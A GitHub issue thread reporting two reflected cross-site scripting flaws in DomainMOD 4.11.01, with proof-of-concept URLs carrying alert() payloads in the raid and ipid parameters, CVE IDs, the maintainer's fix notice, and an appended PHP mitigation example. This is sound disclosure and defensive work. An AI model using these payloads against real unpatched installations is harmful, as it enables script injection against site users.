Cross Site Scripting Vulnerability in DomainMOD 4.11.01 #79

Closed
Dawood9920 opened this issue Nov 9, 2018 · 4 comments
@Dawood9920

Multiple XSS vulnerabilities were discovered in DomainMOD v4.11.01.
There are two XSS vulnerabilities which allow remote attackers to inject arbitrary web script or HTML.

1. http://127.0.0.1/domainmod/assets/edit/registrar-account.php?raid=%22%3E%3Cimg%20src=x%20onerror=alert(%22XSS%22)%3E&del=1
2. http://127.0.0.1/domainmod/assets/edit/ip-address.php?ipid=%22%3E%3Cscript%3Ealert(1)%3C/script%3E&del=1

@Dawood9920
Author

CVE IDs assigned for the two vulnerabilities reported above:

  1. XSS in raid parameter : CVE-2018-19136
  2. XSS in ipid parameter : CVE-2018-19137

@xrand3r

xrand3r commented Nov 19, 2018

I have found a vulnerability too. What is the procedure to responsibly disclose?

@chetcuti
Member

chetcuti commented Feb 3, 2019

@xrand3r, feel free to submit a new GitHub issue or send me an email at support@domainmod.org to report the vulnerability.

@chetcuti
Member

chetcuti commented Feb 3, 2019

These issues were fixed in v4.12.0, which was released today.

Thanks for the reports!

@chetcuti chetcuti closed this as completed Feb 3, 2019
@chetcuti chetcuti self-assigned this Feb 3, 2019
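
The mitigation pattern for this class of bug, as an added example that is not DomainMOD's code and not the v4.12.0 fix: treat `raid` and `ipid` as integer record ids, reject anything else, and HTML-encode any value that is echoed. The helper names `parse_record_id` and `h` are hypothetical, and the `raid=42` request is constructed sample input.

```php
<?php
declare(strict_types=1);

// Added illustration; not DomainMOD code. Helper names are hypothetical.

/** Accept a record id only if it is a plain positive integer string. */
function parse_record_id($raw): ?int
{
    if (!is_string($raw)) {            // e.g. ?raid[]=1 arrives as an array
        return null;
    }
    $id = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;
}

/** Encode a value for HTML text or a quoted attribute. */
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Query strings from the two reported URLs, plus one constructed benign request.
$requests = [
    ['raid', 'raid=%22%3E%3Cimg%20src=x%20onerror=alert(%22XSS%22)%3E&del=1'],
    ['ipid', 'ipid=%22%3E%3Cscript%3Ealert(1)%3C/script%3E&del=1'],
    ['raid', 'raid=42&del=1'],         // constructed
];

foreach ($requests as [$param, $query]) {
    parse_str($query, $get);           // URL-decodes the way PHP fills $_GET
    $raw = $get[$param] ?? null;
    $id  = parse_record_id($raw);

    if ($id === null) {
        // Refuse the request; if the value must be shown or logged, encode it first.
        $shown = is_string($raw) ? h($raw) : '(non-string)';
        printf("%s: rejected, encoded value: %s\n", $param, $shown);
        continue;
    }
    // Only the validated integer reaches the markup.
    printf("%s: <input type=\"hidden\" name=\"%s\" value=\"%d\">\n", $param, h($param), $id);
}
```

Run with `php` on the command line: both reported values are rejected and print only in entity-encoded form, while the constructed integer id passes through to the markup.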